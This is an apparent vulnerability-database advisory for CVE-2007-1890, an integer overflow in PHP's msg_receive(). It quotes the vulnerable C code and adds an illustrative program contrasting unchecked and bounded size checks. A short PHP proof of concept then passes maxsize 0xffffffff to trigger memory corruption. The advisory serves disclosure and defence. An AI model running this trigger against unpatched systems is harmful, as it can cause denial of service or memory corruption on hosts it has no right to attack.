PHP msg_receive() Memory Allocation Integer Overflow Vulnerability

Vulnerability ID: 1112585    Vulnerability type: Boundary condition error
Published: 2007-03-31    Updated: 2007-04-10
CVE: CVE-2007-1890    CNNVD-ID: CNNVD-200704-100
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/29808
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-100
|Vulnerability details
PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML. The implementation of PHP's msg_receive() function contains an integer overflow; a local attacker could exploit it to elevate privileges. msg_receive() uses the maxsize parameter directly in a memory allocation without performing any check on it, which results in an integer overflow. The vulnerable code is as follows:

    PHP_FUNCTION(msg_receive)
    {
        ...
        if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rlzlz|blz",
                                  &queue, &desiredmsgtype, &out_msgtype, &maxsize,
                                  &out_message, &do_unserialize, &flags, &zerrcode) == FAILURE) {
            return;
        }
        ...
        /* maxsize comes straight from the caller and is never range-checked */
        messagebuffer = (struct php_msgbuf *) emalloc(sizeof(struct php_msgbuf) + maxsize);
        /* the same unchecked value is passed to msgrcv() as the buffer length */
        result = msgrcv(mq->id, messagebuffer, maxsize, desiredmsgtype, realflags);

If the underlying msgrcv() call accepts a negative maxsize, this can lead to a buffer overflow.
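As an added illustration (not the page's or PHP's own code), the following C puts the unchecked size computation from msg_receive() beside a bounded version; the struct layout and the function names are simplified assumptions, and the check on maxsize <= 0 mirrors what the fixed PHP releases enforce.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Simplified stand-in for PHP's struct php_msgbuf (message type + payload).
 * The layout is illustrative, not PHP's actual definition. */
struct php_msgbuf {
    long mtype;
    char mtext[1];
};

/* Vulnerable shape from msg_receive(): the caller-controlled long is added to
 * sizeof(struct php_msgbuf) with no check. A negative maxsize converts to a
 * huge size_t, the sum wraps to a tiny allocation, and the same maxsize is
 * then handed to msgrcv() as the buffer length. */
size_t alloc_size_unchecked(long maxsize)
{
    return sizeof(struct php_msgbuf) + maxsize;
}

/* Hardened shape: reject non-positive sizes (the fixed PHP releases refuse
 * maxsize <= 0) and make sure header plus payload cannot wrap size_t.
 * Returns 0 to signal rejection. */
size_t alloc_size_checked(long maxsize)
{
    if (maxsize <= 0)
        return 0;
    size_t payload = (size_t)maxsize;
    if (payload > SIZE_MAX - sizeof(struct php_msgbuf))
        return 0;
    return sizeof(struct php_msgbuf) + payload;
}

int main(void)
{
    /* Constructed sample inputs: a sane size, -1 (the value 0xffffffff has
     * when read as a 32-bit long), and the largest positive long. */
    long samples[] = { 32, -1, LONG_MAX };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("maxsize=%ld unchecked=%zu checked=%zu\n", samples[i],
               alloc_size_unchecked(samples[i]), alloc_size_checked(samples[i]));
    }
    return 0;
}
```

With maxsize = -1 the unchecked computation yields sizeof(struct php_msgbuf) - 1 bytes, while msgrcv() would be told the buffer holds a huge message; the checked version rejects it.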
|Vulnerability exploit (PoC)
source: http://www.securityfocus.com/bid/23236/info

PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory.

Exploiting this issue may allow attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in a denial-of-service condition.

This issue affects PHP versions prior to 4.4.5 and 5.2.1. 

<?php
  // PoC from BID 23236: queue one message, then call msg_receive() with an
  // out-of-range maxsize that vulnerable PHP versions pass unchecked into
  // emalloc() and msgrcv().
  $MSGKEY = 519052;

  $msg_id = msg_get_queue($MSGKEY, 0600);

  if (!msg_send($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
    echo "Msg not sent because $msg_err\n";

  // 0xffffffff is the maxsize value the PoC relies on; $msg receives the message
  if (msg_receive($msg_id, 1, $msg_type, 0xffffffff, $msg, false, 0, $msg_error)) {
    echo "$msg\n";
  } else {
    echo "Received $msg_error fetching message\n";
  }

  // always clean up the queue (the original 'break' here was outside any loop)
  msg_remove_queue($msg_id);
?>
|References

Source: BID
Name: 23236
Link: http://www.securityfocus.com/bid/23236
Source: MISC
Link: http://www.php-security.org/MOPB/MOPB-43-2007.html